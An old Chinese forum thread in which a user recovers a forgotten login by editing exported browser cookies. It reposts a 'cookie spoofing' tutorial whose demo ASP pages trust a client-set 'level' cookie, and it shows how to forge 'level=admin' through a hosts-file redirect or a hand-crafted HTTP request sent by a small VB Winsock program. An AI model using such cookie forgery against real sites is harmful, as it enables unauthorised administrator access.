我動了我的Cookies

[psac]

在試突登入一個forum發現該站點更換了ip，之前登入時的cookie記錄失效，重新登入忘記用戶名以及密碼，如何找回？於是開始了對cookies的探究。忘記密碼，可以通過email找回。可是用戶名連同密碼統統忘記怎麼辦。通過IE的 文件-匯入和匯出嚮導，將cookie全部匯出，當然可以直接在cookies目錄裡面尋找,文章後面會提到，用文本編輯開啟匯出的cookies.txt，會發現如下的格式：
w ww.mydomain.com TRUE / FALSE 1234567890 userid 007
找到想要登入的forum的ip位址，如下所述：

w ww.mydomain.com TRUE / FALSE 116659987 cookietime 2592000 w ww.mydomain.com TRUE / FALSE 1166599879 userid 65246 w ww.mydomain.com TRUE / FALSE 1166599879 password ac23123bf122a123d123b

把www.mydomain.com改成所在的ip位址，再去登入之前的站點，ok了。論壇上就有訪問的用戶名，知道用戶名了，退出登入，然後通過郵箱找回密碼。

其實還有其他的辦法，如
1、該站點以前使用域名登入，現在改為ip登入，修改host文件，可增加
*.*.*.* www.mydomain.com
2、根據cookie欺騙教學一文，利用winsocket編程傳送偽造COOKIE。登入更換ip的站點，用winsock expert選項監視剛才開啟的IE視窗的資料包，輸入test用戶，應該監視到IE向伺服器傳送了如下值cookietime、userid、password。將cookies.txt裡面的對應參數，加到cookietime、userid、password後利用上面提到的文章中的cookiesend。

另外發現cookietime 2592000這個值沒，算一下2592000/30=86400 86400/24=3600 3600/60=60
哈哈，這個cookie的「保質期」是2592000sec，一個月，怎麼改才可以要這個cookie理論上永不過期呢^^

notes:
你也可以直接在win98的%SystemRoot%\cookies目錄下，或是win2k的%USERPROFILE%\cookies目錄下找到全部cookies,再找到USERPROFILE@mydomain.txt文件,用文本編輯開啟,你 會看到的是雜亂的程式碼如：

www.mydomain.com/|1111|1166599879|29121212|116659987|999009900|*|cookietime|2592000 |www.mydomain.com/|1111|1166599879|29121212|1166599879|99009900|*|userid|65246|www. mydomain.com/|1111|1166599879|29121212|1166599879|99009900|*|password|ac23123bf122a 123d123b

看到熟悉的www.mydomain.com，換成所在的ip位址
本文的cookie內容考慮到private info，力求在不影響理解的基礎上做了mosaic處理

btw:結合IECookiesView使用更方便如圖，最新版本是v1.60可以在這裡下載http://freehost14.websamba.com/nirsoft/utils/iecv.zip



附cookie欺騙教學一文
thx reaby@DRL
cookie欺騙教學（1）
---------產生一個COOKIE文件並改變它

唉，很早就想點關於COOKIE的東東了，主要是網上有不少文章說半天其實也
沒有多少實質的東西。
首先大家明白什麼是COOKIE，具體點說如果是98那麼它們預設存放在C:\windows\cookies
目錄下，如果是2k它們在C:\Documents and Settings\%你的用戶名%\Cookies目錄下（每個文件都不會超過4KB）
它們的檔案名格式為：你的用戶名@產生的COOKIE的網頁文件所在的WEB目錄[COOKIE改變的次數].txt
具體的例子：iwam_system@cookie[3].txt
再來看一看一個最簡單的COOKIE文件的內容：
level
admin
www.locking.8u8.com/cookie/
0
1331699712
29536653
4044081984
29528196
*

最前面的兩段為伺服器產生的COOKIE內容（level和admin）第三段為產生這個COOKIE文件的網站的域名和WEB目錄
這兒就要注意了沒有記錄產生COOKIE文件的檔案名！所以在同一個目錄下不同文件產生的COOKIE是同一個文件只是每
產生一次COOKIE的檔案名的中括號裡的數位就要加1，後面的那些就不管它了我也不懂哈
再來看看如何產生一個COOKIE我以vbs cript為例：

<s cript language=vbs>
document.cookie="level" & "=" & "user" & ";expires=Monday, 01-Jan-03 12:00:00 GMT"
msgbox document.cookie
</s cript>

這兒我們特別人注意的是最後一段 ";expires=Monday, 01-Jan-03 12:00:00 GMT"這是用來說明產生的COOKIE文件的
有效時間的，如果沒有那麼這個COOKIE你將不會在本文開頭所說的目錄裡找到它。這個例子中有效時間是2003年當然你

也就能在本機硬碟上找到它們了。
另外當用document.cookie來得到COOKIE內容時設定COOKIE有效時間這一段將被忽略（當然這也方便了網站的COOKIE

*作）比如說上面將彈出一個內容為 level=user的對話視窗

好了現在我們來實戰一下：
我的網站叫www.locking.8u8.com在它的COOKIE目錄裡有兩個文件一個是admin1.htm內容就是上面的例子
還有一個文件叫level1.htm內容如下：
<s cript language=vbs>
co=document.cookie
le=mid(co,instr(co,"=")+1,len(co)-instr(co,"=")+1)
if le="user" then
msgbox "you are a user"
else
if le="admin" then
msgbox "you are a administrator"
else
msgbox "you not login"
end if
end if
</s cript>

當你先瀏覽admin1.htm後再瀏覽level1.htm時將彈出一個對話視窗內容為："you are a user"，當你沒有瀏覽過
admin1.htm而直接瀏覽level1.htm將說 "you not login" (注意有的人可能會先瀏覽admin1.htm後再直接在硬碟
上更改COOKIE的內容當然這樣是不行的)

好了我們的目標就是讓我們能在瀏覽level1時彈個框框說 "you are a administrator"
辦法只有兩個咯：1）把8u8黑了，然後找到那個level1.htm改了不就可以了不過本篇文章不做討論哈
2）進行COOKIE欺騙，OK LET GO：）

-----------------------------------（我的系統環境一台2kserver+iis5）
第一步：自已做一個檔案名叫admin2.htm吧內容如下
<s cript language=vbs>
document.cookie="level" & "=" & "admin" & ";expires=Monday, 01-Jan-03 12:00:00 GMT"
</s cript>
然後把它放入一個名叫COOKIE的可瀏覽目錄中（COOKIE要位於根目錄）

第二步：找到位於C:\WINNT\system32\drivers\etc下的hosts文件在它的後面加上如下一段：

127.0.0.1 www.locking.8u8.com

第三步：仿問www.locking.8u8.com/cookie/admin2.htm(這兒實際是仿問的本地機的文件)

第四步：刪除hosts中剛才我們增加的內容然後再清掉IE的歷史記錄

第五步：讓我們再次仿問www.locking.8u8.com/cookie/level1.htm

怎麼樣我們現在是 administrator了吧（注意仿問網站是一定要在前面加三個w）


COOKIE欺騙教學2

------------- 利用winsocket編程傳送偽造COOKIE

在上一節中我所舉的例子是一個存活期很長的COOKIE，對於這種
COOKIE他會產生在我們的本機碟上的，而對於那些關閉瀏覽器就失效
的COOKIE我們該怎樣來進行欺騙偽造呢？
首先我們應該知道在我第一節的例子中彈那個"you are a administrator"
框框的網頁(level1.htm)其實是下載在我的本機然後執行的,也就是說
他對COOKIE的檢驗讀取也是在本機，那如果是在遠端伺服器上呢？比如
一個ASP程序他又是如何讀取我們的COOKIE的呢?
先來看看基本的東東吧：當我們使用HTTP傳輸協定向遠端主機傳送一個
GET或是POST請求時，那麼如果有這個域名的COOKIE存在(不管是在記憶體中
還是本機碟上的)都將和請求一起傳送到伺服器去.

下面的就是一個實際的例子:

GET /ring/admin.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 61.139.xx.xx
Connection: Keep-Alive
Cookie: level=user; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM

看到最後一行了吧

然後我們再來看看伺服器是如何進行COOKIE檢驗的，我舉了一個簡單的例子:
有兩個ASP文件一個叫admin.asp，還有一個叫level.asp

-----------admin.asp------------------
<%response.write now()%>
<%response.write "<br>"%>
<%response.cookies("level")="user"%>
<%response.write "<html><s cript>document.write(document.cookie);</s cript></html>"%>

-----------cut here-------------------

-----------level.asp------------------
<%
if Request.Cookies("level")<>"" then
response.write "<html><s cript>document.write(document.cookie);</s cript></html>"
if request.cookies("level")="user" then
response.write "<html><s cript>alert(<|>you are a user<|>);</s cript></html>"
else
if request.cookies("level")="admin" then
response.write "<html><s cript>alert(<|>you are administrator!<|>);</s cript></html>"
set fso1=server.createobject("s cripting.filesystemobject")
set fil=fso1.opentextfile("d:\sms\ring\a.txt",8,true)
fil.writeline "you are admin!"
end if
end if
else
response.write "<html><s cript>alert(<|>you are not login<|>);</s cript></html>"
end if
%>
-----------cut here-------------------

說明:當你請求admin.asp時，將產生一個臨時的COOKIE(你關閉瀏覽器就會失效),然後我們不關閉瀏覽器而
請求level.asp時它就會用request.cookies來提取你發出的請求裡面的cookie,如果你的COOKIE裡面的內容是
admin的話那麼它將用fso對像在伺服器產生一個記錄文件(a.txt要注意的是我們在實驗時要把目錄設為可寫)

好了就介紹這麼多吧，我們的目的就是讓伺服器產生a.txt並寫入內容"you are admin"還是進行上一節的
域名欺騙嗎?不是讓我們寫一個winsocket程序吧,Let GO

下面是我們VB+WINSCOKET控件寫的一個簡單的例子的來源碼:

-----------------------COOKIE SEND---------------------------------------
Private Sub Command1_Click()
Winsock1.RemotePort = Text3.Text <|>遠端主機開啟的連接阜一般都為80
Winsock1.RemoteHost = Text2.Text <|>遠端主機的域名也可以輸IP
Winsock1.Connect <|>開啟一個SOCKET連接
Command1.Enabled = False <|>一次只能開啟一個連接所以要讓SEND按鈕失效
End Sub

Private Sub winsock1_Connect()
Winsock1.SendData Text1.Text <|>開啟連接成功的話就傳送資料
End Sub

Private Sub Command2_Click()
Winsock1.Close
Command1.Enabled = True <|>關閉連接,讓SEND按鈕有效
End Sub


Private Sub winsock1_DataArrival(ByVal bytesTotal As Long) <|>接收資料,可以讓我們檢查資料是否傳送成功
Dim tmpstr As String
Winsock1.GetData tmpstr
Text4.Text = tmpstr
End Sub

-----------------------CUT HERE--------------------------------------------

好，再讓我們看一看具體的程序吧:這兒要用到一個不錯的程序WinSock Expert v0.3 beta 1

一步：開啟一個IE然後再開啟winsock expert選項監視剛才開啟的IE視窗的資料包
二步: 在IE位址欄輸http://61.139.xx.xx/ring/admin.asp,那個我將看到發出了如下資料

GET /ring/admin.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 61.139.xx.xx
Connection: Keep-Alive

不要半閉視窗請http://61.139.xx.xx/ring/level.asp，我們又將看到發出了如下資料

GET /ring/level.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 61.139.xx.xx
Connection: Keep-Alive
Cookie: level=user; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM

三步： 好了對第二次發出的資料的最後一行Cookie: level=user; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM
就是我們要改的東東，由於level.asp中相應的COOKIE的檢驗語句為if request.cookies("level")="admin" then
所以我們只要把上面的資料的最後一行改成Cookie: level=admin; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM
就可以了，後面的東東很重要下面我再說明一下

四步: 把改過的資料拷到我編的程序的傳送框裡面輸入連接阜和域名後。。。。。

五步：到伺服器看看是不是產生了那個a.txt裡面的內容為"you are admin!


好了不寫了，主要還是自已多實驗就可以了為了放便大家本文章的程序程式碼完全公開哈

1.admin.asp和level.asp: http://locking.8u8.com/cookie/admin.txt和level.txt
2.cookieclient.exe及來源碼: http://locking.8u8.com/cookie/cookiesend.zip
3.winsock expert: http://software.tom.com/download.asp?id=7500 或是 http://dxqsoft.myrice.com/

[NiGHTsC]

哈哈，沒想到 PSAC 大大連這個改變 COOKIE 的連結都會，
想都沒想過的說，真強，真強。